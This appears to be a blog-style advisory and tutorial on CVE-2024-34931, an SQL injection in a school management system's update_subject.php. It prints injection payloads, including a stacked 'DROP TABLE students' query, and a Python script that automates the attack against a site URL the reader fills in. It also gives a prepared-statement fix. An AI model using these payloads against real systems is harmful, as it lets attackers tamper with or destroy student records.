CVE-2024-34931 - Exploiting SQL Injection in Campcodes Complete Web-Based School Management System 1. – A Hands-On Guide

---

The security world discovered another serious flaw—CVE-2024-34931—in the popular Campcodes Complete Web-Based School Management System 1.. This vulnerability allows attackers to run their own SQL commands through a simple “name” field, putting sensitive student and school data at serious risk. In this post, we’ll break down what’s going on, show you how the attack works with real code, and tell you where you can find more information.

CVE-2024-34931 is a classic SQL Injection weakness found in the script

/model/update_subject.php

If an attacker sends a carefully crafted string in the name parameter, the PHP script doesn't filter or sanitize it. This lets an attacker trick the database into running SQL queries that they control.

Why Is This Dangerous?

- Data Theft: Attackers can see or copy any data in your database (like student grades, addresses, or credentials).

Let’s look at the vulnerable code. The script might look like this inside update_subject.php

<?php
// Retrieve input from a form or AJAX call
$id = $_POST['id'];
$name = $_POST['name'];

// Vulnerable query!
$query = "UPDATE subjects SET name = '$name' WHERE id = $id";

mysqli_query($conn, $query);
?>

What’s wrong?
The $name value is dropped straight into the SQL statement. If an attacker uses a quote mark ('), they can break out of the string and add their own SQL!

Assuming a legitimate request looks like

POST /model/update_subject.php
Content-Type: application/x-www-form-urlencoded

id=1&name=Math

An attacker might send

id=1&name=Math', description='Hacked', name='Math

Now the SQL statement becomes

UPDATE subjects SET name = 'Math', description='Hacked', name='Math' WHERE id = 1

With more evil intent, the attacker could try

id=1&name=Math'; DROP TABLE students; --

This turns the SQL into

UPDATE subjects SET name = 'Math'; DROP TABLE students; --' WHERE id = 1

If the database supports multiple statements, this could erase entire tables!

Below is a quick Python script using requests to show how an attacker might automate this

import requests

url = "http://target-site.com/model/update_subject.php";
payload = "Math', description='Hacked', name='Math"

data = {
    'id': '1',
    'name': payload
}

r = requests.post(url, data=data)
print('Exploit sent, server responded:', r.status_code)

Replace http://target-site.com with the school’s real URL. After running this script, the attacker could read back the “Hacked” record, proving the exploit worked.

How To Fix?

Always use prepared statements (also called “parameterized queries”), so user input never touches the query directly.

Here’s a safe version

$stmt = $conn->prepare("UPDATE subjects SET name = ? WHERE id = ?");
$stmt->bind_param("si", $name, $id);
$stmt->execute();

No matter what goes into $name, it will only be treated as data, not as part of the SQL command.

More Reading

- Official CVE Entry
- Campcodes School Management System Details
- SQL Injection Explainer – OWASP

Summary

We’ve walked through CVE-2024-34931, a serious SQL injection flaw in Campcodes School Management System. Anyone running v1. should update their code immediately to use prepared statements. SQL Injection is easy to avoid, but fatal if missed.

Stay safe and always sanitize your inputs!

*This guide is meant for educational purposes only. Never test these methods without permission.*

Timeline

Published on: 05/23/2024 17:15:29 UTC
Last modified on: 12/03/2024 17:15:10 UTC